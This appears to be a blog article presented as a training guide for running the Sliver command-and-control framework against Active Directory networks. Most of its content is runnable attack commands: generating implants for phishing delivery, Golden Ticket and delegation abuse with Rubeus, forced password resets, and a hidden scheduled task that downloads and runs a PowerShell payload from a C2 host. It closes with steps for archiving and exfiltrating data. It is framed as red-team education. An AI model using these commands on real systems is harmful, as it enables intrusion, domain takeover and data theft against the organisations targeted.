Listen to this Post

Introduction:
Command and Control (C2) frameworks are the central nervous system of modern cyber operations, enabling red teams and threat actors to maintain persistent access within target networks. Mastering a tool like Sliver is a critical skill for understanding both offensive security postures and defensive detection strategies. This article delves into the core techniques covered in an advanced C2 operations module, translating theoretical knowledge into actionable, hands-on command-line procedures for security professionals.
Learning Objectives:
- Understand the end-to-end workflow for deploying and operating the Sliver C2 framework against simulated enterprise environments.
- Master key privilege escalation and lateral movement techniques within Active Directory, including Kerberos exploitation and DACL abuse.
- Develop troubleshooting methodologies for unstable C2 beacons and learn to integrate manual tooling when automated frameworks fail.
You Should Know:
1. Establishing Your C2 Infrastructure with Sliver
A C2 server acts as the command post. Sliver, written in Go, is known for its cross-platform implants and active development. The first step is setting up a secure server capable of managing connections from compromised hosts (beacons).
Step‑by‑step guide:
Step 1: Server Installation. On your Linux-based C2 server, install Sliver. The recommended method is via the installer script.
curl https://sliver.sh/install|sudo bash
Step 2: Start the Server. Once installed, start the Sliver server. This will generate necessary encryption keys and start the listener interfaces.
sliver-server
Step 3: Generate an Implant. From the Sliver console, generate a payload for your target operating system. For a Windows target, you might generate a Windows Executable.
generate --mtls <YOUR_C2_IP> --os windows --arch amd64 --save /tmp
Step 4: Stage and Execute. Transfer the generated implant (.exe file) to the target machine via your chosen initial access vector (e.g., phishing). Execute it to establish the first beacon connection back to your server.
2. Initial Foothold and Privilege Escalation
Once a beacon checks in, you have a foothold. The next objective is to escalate privileges to a higher-integrity account (like `SYSTEM` or root) to gain the access necessary for lateral movement.
Step‑by‑step guide:
Step 1: Information Gathering. Use the beacon to run basic reconnaissance commands.
In a Sliver beacon session run whoami /all run systeminfo ps List running processes
Step 2: Identify Escalation Vectors. Look for misconfigurations. A common Windows method involves checking for unquoted service paths or vulnerable drivers. You can use built-in Sliver commands or upload manual tools like WinPEAS.
Upload and execute WinPEAS from your C2 upload /path/to/winpeas.exe C:\Users\Public\winpeas.exe run C:\Users\Public\winpeas.exe
Step 3: Execute the Escalation. Based on your findings, use an appropriate exploit. For example, if you find a service writable by your user, you might use a service binary replacement attack.
3. Active Directory Enumeration with PowerView
With elevated privileges on a domain-joined host, the attack surface expands to the entire Active Directory forest. Enumeration is the process of mapping users, groups, computers, and trust relationships to identify attack paths.
Step‑by‑step guide:
Step 1: Load PowerView. PowerView is a PowerShell tool for AD reconnaissance. You can load it directly into memory to avoid disk detection.
From a Sliver beacon with PowerShell capabilities powershell-import /path/to/PowerView.ps1
Step 2: Discover Domain Information.
powershell Get-NetDomain powershell Get-NetDomainController
Step 3: Map Users and Logged-On Sessions. Identify high-value targets and where they might be logged on.
powershell Get-NetUser | select cn,description,lastlogon powershell Get-NetSession -ComputerName <TARGET_SERVER>
Step 4: Identify Lateral Movement Paths. Find computers where your current user has local admin rights.
powershell Find-LocalAdminAccess
4. Kerberos Attacks: Golden Tickets and Delegation Abuse
Kerberos is the primary authentication protocol in AD. Attacks against it can lead to devastating domain compromise. Two critical attacks are Golden Ticket (forging authentication tickets) and Kerberos Delegation abuse (misusing trusted services).
Step‑by‑step guide for Golden Ticket Attack:
Prerequisite: Obtain the `krbtgt` user’s NTLM hash (often through Domain Controller compromise).
Step 1: Use Mimikatz/Rubeus. With the hash, you can forge a Ticket Granting Ticket (TGT). This is often done with tools like Rubeus.
Using Rubeus (executed from a beacon) execute-assembly /path/to/Rubeus.exe golden /krbtgt:<NTLM_HASH> /domain:<DOMAIN> /sid:<DOMAIN_SID> /user:Administrator /ptt
Step 2: Pass the Ticket. The `/ptt` flag injects the ticket into the current session. You now have Domain Admin privileges across the forest.
Step‑by‑step guide for Constrained Delegation Abuse:
Step 1: Find Accounts with Delegation Rights. Using PowerView:
powershell Get-DomainUser -TrustedToAuth powershell Get-DomainComputer -TrustedToAuth
Step 2: Request Service Tickets. If you compromise an account (serviceA$) with delegation configured for a specific service (cifs/TARGET-SERVER), you can use Rubeus to request a ticket for any user to that service.
execute-assembly /path/to/Rubeus.exe s4u /user:serviceA$ /rc4:<SERVICE_A_NTLM> /impersonateuser:Administrator /msdsspn:cifs/TARGET-SERVER.domain /ptt
Step 3: Access the Resource. You can now access `TARGET-SERVER` as the Administrator.
5. DACL Abuse and Lateral Movement
Discretionary Access Control Lists (DACLs) define permissions on AD objects. Misconfigured DACLs can allow a low-privilege user to modify high-value objects, like adding themselves to a privileged group.
Step‑by‑step guide for `ForceChangePassword` Abuse:
Step 1: Find Vulnerable DACLs. Use PowerView’s `Find-InterestingDomainAcl` function or BloodHound to identify users where your controlled account has the `ForceChangePassword` right.
Step 2: Change the Password. With the appropriate right, you can set a new password for the target user using .NET methods or tools.
$NewPassword = ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force Set-DomainUserPassword -Identity TargetUser -AccountPassword $NewPassword
Step 3: Assume the Identity. Now that you know the new password, you can use `runas` or the `make_token` command in your C2 framework to switch contexts to the more privileged account and move laterally.
6. Navigating C2 Instability and Integrating External Tools
As noted in the source experience, C2 beacons can be unstable. A professional operator must know how to pivot to manual, scripted tradecraft when the primary framework fails.
Step‑by‑step guide:
Step 1: Establish a Fallback Channel. Before critical operations, use your beacon to deploy a secondary, lightweight persistence method (e.g., a scheduled task that runs a simple reverse PowerShell one-liner).
Create a scheduled task as a backup run schtasks /create /tn "BackupTask" /tr "powershell -w hidden -c 'iex(New-Object Net.WebClient).DownloadString(\"http://your-c2/payload.ps1\")'" /sc daily /st 09:00
Step 2: Upload and Execute Standalone Tools. When a built-in command fails, upload a statically compiled version of the needed tool (e.g., Rubeus.exe, Seatbelt.exe) and execute it directly.
upload /opt/tools/Rubeus.exe C:\Windows\Tasks\Rubeus.exe run C:\Windows\Tasks\Rubeus.exe harvest /interval:30
Step 3: Exfiltrate Data Manually. If automated exfiltration fails, use built-in OS utilities to package and transfer data.
run cmd /c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Compress-Archive -Path C:\interesting\ -DestinationPath C:\Windows\Temp\data.zip" download C:\Windows\Temp\data.zip
What Undercode Say:
Key Takeaway 1: Tool Instability is an Operational Reality. The experience of inconsistent beacon behavior underscores a critical lesson: mastery of the underlying protocols (Kerberos, LDAP, SMB) is more valuable than mastery of any single C2 GUI. When automation fails, fundamental knowledge and manual tooling become your primary weapons.
Key Takeaway 2: The Defensive Gap is in Automated Behavior. C2 frameworks like Sliver are constantly evolving to evade detection, but their built-in commands often create predictable patterns (specific process injection, named pipe creation). Skilled blue teams can hunt for these patterns. The most dangerous operators are those who minimally use these features, instead acting as “humans in the loop” who use the C2 as a simple transport layer for custom, off-script tradecraft, blending in with normal admin activity.
Prediction:
The future of C2 operations lies in increased abstraction and AI-assisted decision-making. Frameworks will evolve beyond simple remote shells into integrated “adversary operating systems” that can autonomously perform initial enumeration, suggest optimal attack paths based on live environment data, and dynamically generate context-aware payloads to avoid signature-based detection. However, this will create a parallel arms race in defensive AI, leading to automated threat hunting systems that can model user and entity behavior (UEBA) to detect the subtle anomalies of a human-directed attack hidden within noisy, automated red team tool traffic. The ultimate differentiator will remain the operator’s deep understanding of the systems they are targeting, not the sophistication of the tool they are using.
▶️ Related Video (76% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Josephgamil Completed – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


